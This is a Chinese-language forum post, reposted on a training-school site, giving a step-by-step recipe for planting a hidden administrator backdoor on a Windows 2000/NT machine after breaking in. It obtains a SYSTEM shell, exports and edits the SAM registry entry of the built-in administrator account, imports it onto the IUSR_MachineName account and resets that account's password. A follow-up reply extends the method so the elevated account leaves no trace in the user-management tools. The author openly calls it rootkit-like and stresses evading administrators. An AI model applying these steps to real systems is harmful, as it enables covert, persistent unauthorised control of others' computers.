青华模具培训学校

 找回密码
 注册

QQ登录

只需一步,快速开始

青华模具培训学院
查看: 3282|回复: 2

克隆管理员帐号的方法

[复制链接]
发表于 2008-7-26 08:20 | 显示全部楼层 |阅读模式
[url=]减小字体[/url] [url=]增大字体[/url]
经常看到一些人在入侵一台Windows 2000或者Windows NT后堂而皇之地创建一个管理员组的用户,似乎当管理员不存在一般,今天偶违背一下偶以前的初衷,Share一个类似于RootKit的玩艺,当然,这些过程也是可以用脚本实现的,但是我就不写了,OK,Show Time Now。
& Q# x6 m) r2 d! H. M* [  ?' B" v$ l' i6 F
首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。
  b+ V# y, l1 L8 q
; Y2 [3 l, ]* C) H  p运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 8 `7 ]6 Z$ l. B3 a  n
以下是引用片段:
) R3 z& C2 o' C3 t2 d7 C9 W" Aregedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   
( F. o' Q6 n1 b( K
% F8 A- }, W7 P/ @# k' l这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的’1F4’修改为’3E9’后执行
; n2 F8 a$ C. h( z) Iregedit /s adam.reg
" F  X4 R" [5 ~导入该Reg文件
# _# U% p( V4 e/ T% [* j4 M4 v6 ~( G
& \3 R6 y& J1 }" F然后运行
' A6 K' I$ g1 ^1 ^! d6 c0 y, k; inet user IUSR_MachineName Sometips
5 c$ V2 R$ d; e1 v3 L9 m修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)
4 f' u: d! ]4 \& u6 q: z7 P% o6 \8 e, ?# _$ r: g+ G
OK,大功告成... 5 h, d9 i6 s0 r6 N1 S4 ]+ J$ N
& V$ O( {3 O! q7 T& ]. H2 O
这样,我们拥有和默认管理员一样的桌面、一样的Profile.....
" }! O' C+ N6 ^( ]* }2 j而且,当我们运行 net localgroup administrators 时,看看结果:
7 P' y- }6 G. y- d) u. I以下是引用片段:8 q" f4 Y- l5 K( }% m/ c1 v
C:/>net localgroup administrators   0 b3 }% u; o* d5 y+ h2 N
Alias name administrators   
! @* a- W; Y5 q# K1 dComment Administrators have complete and unrestricted access to the computer/domain   1 [1 c! g0 o( G
; V; O8 _- d6 D
Members   5 m/ O+ \1 G; [, A

$ `+ Q# e7 t+ K9 }-------------------------------------------------------------------------------   
7 Z! ]. [* ]2 m2 N: e, u5 nAdministrator   
8 e7 z5 d: E5 C* l1 UThe command completed successfully.   * p: [1 M7 s/ G" J& \$ p" b* o! Q6 P
( ]7 \5 f0 A/ |# n
再看看USER2SID的输出结果: ( \7 T" |4 E$ m: d, s) G
C:/>user2sid Administrator
/ G/ K7 R4 W3 E  B' V% T0 u1 o3 `  S4 d9 Y
S-1-5-21-1004336348-1078145449-854245398-500 , z/ S& F/ \- y) T& y/ N
  z0 L( a( J) Z4 b
Number of subauthorities is 5
7 X! c( {. O% d+ Y# x% W0 R. ]- oDomain is IDONTKNOW " b. X$ q% V3 Y1 _
Length of SID in memory is 28 bytes
" D( K% p; \9 q; E$ XType of SID is SidTypeUser
6 a1 p2 g/ V0 r% Y+ s2 u( T
9 w2 g- W0 l0 L* i$ GC:/>user2sid iusr_machinename
" B# P* K2 W7 ^% {: z7 B2 x9 F# ~  ]" P# [+ K
S-1-5-21-1004336348-1078145449-854245398-1001 8 x  k4 ^- ^  {; o% W; K, o9 u

$ J* W5 ~. T1 qNumber of subauthorities is 5
: K+ v! S4 l5 k2 H& {3 _Domain is IDONTKNOW $ ?# d: |# W- ?# P. d) H
Length of SID in memory is 28 bytes 9 B% }' [5 [4 U) w1 Q
Type of SID is SidTypeUser
) c( t  k! N0 h% x  h5 M6 e* A
0 U2 C  E  [/ G" |我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)
' s/ z3 ]5 z8 T4 C( B
2 r2 t9 w4 q3 s& p% R^_^,这算不算RootKit...
  s8 B) ~) |8 n  n* d/ ~* s' _6 s4 X5 |# E; \
附: / Y+ `* k# \# C4 F* p' C
1、感谢叮叮付出需要reinstall OS的代价...   o- y9 P9 p" p& J
2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...
0 x+ [4 G3 X* ]2 d3 h, a! s, r7 X% N) I3 S; K
----------------------------------------------------------------------------- ' F: K: y& f8 h) t5 E5 b
& X% K) Q5 s$ e( a/ Z& ?
叮叮 的补充完善 8 \- I7 h) p0 d& f# N5 v3 H0 D

$ F  w9 _, J( n; B; T4 |: A9 @很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。
9 F% T. c1 j5 _& }: y现给出解决办法。
* j! v' l" b) T, V
2 g; b( _3 m/ |9 X方法同上,不过这次修改内容多一些。即 ! S7 U* x/ Y, r0 r$ q
这次要导出两个key内容:   _, i+ U9 L+ C  M; |& O" o- U/ J( }
一个是adam提到的   v7 z! F9 l- _; T, h  t( B$ R* t
以下是引用片段:) C: p+ O+ T& f/ N7 U& e' s
regedit /e adam.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4   
5 p1 {- m8 O: a2 w& p: P
6 x& a& a; b0 u7 `然后另外一个是你需要修改那个账号的值 - \( R2 W6 P$ V) O8 B
以下是引用片段:
% i4 ]0 a8 ~8 o) b% p2 X/ Iregedit /e iusr.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000003E9 然后按照adam提到的修改adam.reg + D: h+ S( i/ S# X  y/ v, p9 k4 Q
“将adam.reg文件的第三行 以下是引用片段:
1 |! }: p' c0 T0 L--[HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/000001F4]最后的’1F4’ - g. `1 }* R2 V+ d
修改为IUSR_MachineName的SID”
3 {# z" M) Q- T8 I( b, [4 T; L& J+ I  l) F% k
现在,你还要从iusr.reg文件中复制一下内容
% ]3 P9 l, [% V  n就是将iusr.reg文件中“’V’=hex:0”开始一直到iusr.reg文件结束部分复制下来 & V& s# T7 \* |- C; p/ J4 o$ \
然后替换掉adam.reg中同样位置的部分
+ I0 Z9 Z  i$ e5 I$ G
: F- Z6 L& k; U/ |$ C- G  p5 V最后使用 % t" a, x# l9 {) r% N7 I- O, C
regedit /s adam.reg
' n! |( e+ \$ E& O) i& k导入该Reg文件
- h* m+ F! Y) r& L呵呵,别忘了给这个IUSR_MachineName改密码哦。 8 I6 n# a# y  |; q
hehe,ok,大功告成。 0 h6 u7 G/ y+ v8 @
现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和 ) s( U/ R- ^# P$ t2 M
管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。
/ t3 T$ p8 ?9 }都和修改前没有任何区别。
发表于 2008-9-2 10:07 | 显示全部楼层

不错不错

不错不错
4 c" b" o/ u$ d  {! j赞一个
发表于 2008-12-30 13:32 | 显示全部楼层
不错不错- w* [- _5 ?/ m% D% \
赞一个
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|关于我们|sitemap|小黑屋|Archiver|手机版|UG网-UG技术论坛-青华数控模具培训学校 ( 粤ICP备15108561号 )

GMT+8, 2024-11-18 02:38 , Processed in 0.051297 second(s), 24 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表